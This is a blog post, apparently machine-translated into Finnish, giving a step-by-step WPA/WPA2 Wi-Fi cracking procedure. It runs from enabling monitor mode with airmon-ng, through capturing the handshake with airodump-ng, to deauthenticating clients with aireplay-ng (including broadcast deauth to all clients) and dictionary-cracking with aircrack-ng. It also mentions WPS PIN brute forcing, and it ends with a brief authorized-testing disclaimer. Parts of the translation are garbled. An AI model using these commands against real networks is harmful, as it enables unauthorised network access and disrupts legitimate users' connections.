Search

If you are planning to pentest a WPA/WPA2 network (with No WPS), I have two words for you: Good. Onni.

kaikissa penetraatiotestillä tekemissäni kokeissa olen havainnut sanakirjahyökkäykset WPA/WPA2-kättelyyn ärsyttävimmiksi ja turhimmiksi harjoituksiksi. Tämä johtuu siitä, että:

  • jokaisen sanan läpikäyminen miljoonia sanoja sisältävässä sanakirjatiedostossa on aikaa vievää.
  • onnistumisesta ei ole takeita (salasanaa ei välttämättä löydy sanakirjastasi).

Intiassa tekemieni kokeiden aikana WiFi-salasanasanat ovat yleensä yhdistelmä hindin ja englannin sanoja tai Hindunimi, joita ei tietenkään ole missään lataamassani sanakirjassa, vaikka se olisi kuinka tyhjentävä tahansa.

jos vielä uskallat kokeilla sanakirjahyökkäystä WPA: n kättelyyn, tässä on toimenpide.

UPDATE: olen myös julkaissut YouTube-kanavallani videon siitä, miten vangitsemme ja murramme WPA: n kättelyn.

miten käynnistää sanakirjahyökkäys WPA: n kättelyyn

saatat saada tuuria ja lähin WiFi-salasana voi perustua yleiseen sanakirjasanaan tai numerosarjaan. Tällaisessa tapauksessa saatat onnistua sanakirjahyökkäyksellä.

Vaihe 1: Ota käyttöön näyttötila langattomassa käyttöliittymässä

airmon-ng start wlan0

tämä käynnistää näyttötilan.

Vaihe 2: huomioi lähimmät WiFi-verkot.

airodump-ng mon0

Vaihe 3: ota huomioon kohdeverkkosi kanava, dumppaa paketit kyseiseltä kanavalta ja tallenna ne paikalliseen kaappaustiedostoon.

airodump-ng -c6 mon0 -w capture_file

Vaihe 4: Odota WPA handshake capture

tässä vaiheessa, voit käyttää ’aireplay-ng’ de-todentaa liittyvän laillisen asiakkaan verkosta. Pointti on, että koska hän/hän tunnistaa uudelleen pian, vangitsemme kättelyn joutumatta odottamaan liian kauan.:

aireplay-ng --deauth 0 -a <AP\_MAC> -c <CLIENT\_MAC> mon0

jos et tiedä MAC tahansa liittyvän asiakkaan, yksinkertaisesti ’lähettää ”deauth’ kaikille asiakkaille:

aireplay-ng --deauth 0 -a <AP\_MAC> mon0

Vaihe 5: kun tartut WPA kädenpuristus tulee kova osa brute pakottaa käyttämällä sanakirjaa. Käytä tähän ilmaisua ”aircrack-ng”:

aircrack-ng capture\_file-01.cap -w /media/Pranshu/...../dic/dark0de.lst

lausukaa nyt rukouksenne ja toivokaa, että salasana löytyy valitsemastanne sanakirjasta.

Voit myös käyttää verkossa hajautettua WPA/WPA2 – kättelytyökalua tällä sivustolla:

huomaa, että jos tukiasema on käytössä, WPA / WPA2-tunnuslause on helpompi palauttaa, koska on olemassa vain 11 000 mahdollista yhdistelmää, jotka tarvitaan WPS-tunnusluvun raakaan pakottamiseen toteutusvirheen vuoksi.

Vastuuvapauslauseke: Tämä on tarkoitettu vain kokeisiin tai hyväksyttyihin penetraatiotesteihin.

Vastaa

Sähköpostiosoitettasi ei julkaista.